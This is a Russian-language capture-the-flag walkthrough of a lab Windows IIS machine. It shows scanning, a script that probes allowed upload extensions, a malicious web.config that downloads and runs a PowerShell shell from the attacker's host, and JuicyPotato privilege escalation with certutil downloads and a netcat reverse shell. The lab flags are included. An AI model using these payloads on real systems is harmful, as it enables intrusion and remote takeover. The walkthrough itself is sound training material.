Обзор сервисов

Проведем сканирование портов с помощью nmapAutomator и gobuster:

$ nmapAutomator.sh -H 10.10.10.93 -t Full

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

$ gobuster dir --url http://10.10.10.93/ -w /usr/share/dirb/wordlists/common.txt -x asp,aspx,txt,pdf

/aspnet_client        (Status: 301) [Size: 156] [--> http://10.10.10.93/aspnet_client/]
/transfer.aspx        (Status: 200) [Size: 941]                                        
/uploadedfiles        (Status: 301) [Size: 156] [--> http://10.10.10.93/uploadedfiles/]

Скрипт

Пробуем написать скритп для страницы: http://10.10.10.93/transfer.aspx

$ nano checker.py
#!/usr/bin/python3
import requests
import sys
import re
from bs4 import BeautifulSoup

url = "http://10.10.10.93/transfer.aspx"
filename = "extension.txt"

def upload(f):
    s = requests.Session()
    r = s.get(url)
    #if r.status_code == 200:
    #    print("[INFO] Checking...{0}".format(f))
    #else:
    #    print("[ERROR] Can't connect...")
    #    sys.exit(1)    
    p = BeautifulSoup(r.content, "html.parser")    
    viewState = p.find(attrs = {'name' : '__VIEWSTATE'})['value']
    eventValidation = p.find(attrs = {'name' : '__EVENTVALIDATION'})['value']    
    postData = {
            '__VIEWSTATE' : viewState,
            '__EVENTVALIDATION' : eventValidation,
            'btnUpload' : 'Upload'
            }    
    uploadedFile = {'FileUpload1' : (f, 'test')}
    r = s.post(url, files=uploadedFile, data=postData)
    return r.text


print("[INFO] Allowed Extensions:")
for i in open(filename, 'r'):
    #print(i[:-1])
    response = upload('bigb0ss.' + i[:-1])
    if "successfully" in response:
        print("[+] %s" % i.strip())

$ nano extension.txt:
png
jpg
php
php5
php7
phtml
txt
html
asp
aspx
exe
config
js

$ python3 checker.py
[INFO] Allowed Extensions:
[+] png
[+] jpg
[+] config

Запишем свою полезную нагрузку в web.config:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
   <appSettings>
</appSettings>
</configuration>
<!-- ASP code comes here
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.6/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->

Запишем шелл нишанга в shell.ps1 и загружаем web.config:

python3 -m http.server 80
rlwrap nc -lnvp 1234
curl http://10.10.10.93/uploadedfiles/web.config

Флаг пользователя 

PS C:\users\merlin\desktop> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.93
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{27C3F487-28AC-4CE6-AE3A-1F23518EF7A7}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
PS C:\users\merlin\desktop> type user.txt
e29ad89891462e0b09741e3082f44a2f

Повышение привилегий

Просто воспользуемся JuicyPotato: https://github.com/ivanitlearning/Juicy-Potato-x86/releases/download/1.2/Juicy.Potato.x86.exe

На локальной машине:

python3 -m http.server 
rlwrap nc -lnvp 1235
rlwrap nc -lnvp 1236

На удаленной машине:

> certutil -urlcache -f "http://10.10.14.8/JuicyPotatoX86.exe" js.exe
> certutil -urlcache -f "http://10.10.14.8/nc.exe" nc.exe
> nc.exe 10.10.14.6 1235
> jp.exe -l 1234 -p nc.exe -a "10.10.14.6 1236 -e cmd.exe" -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820}

(нужно взять нестандартный clsid для windows 2008 отсюда https://ohpe.it/juicy-potato/CLSID/)

Флаг суперпользователя 

C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.93
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{27C3F487-28AC-4CE6-AE3A-1F23518EF7A7}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
C:\Users\Administrator\Desktop>type root.txt                                                       
c837f7b699feef5475a0c079f9d4f5ea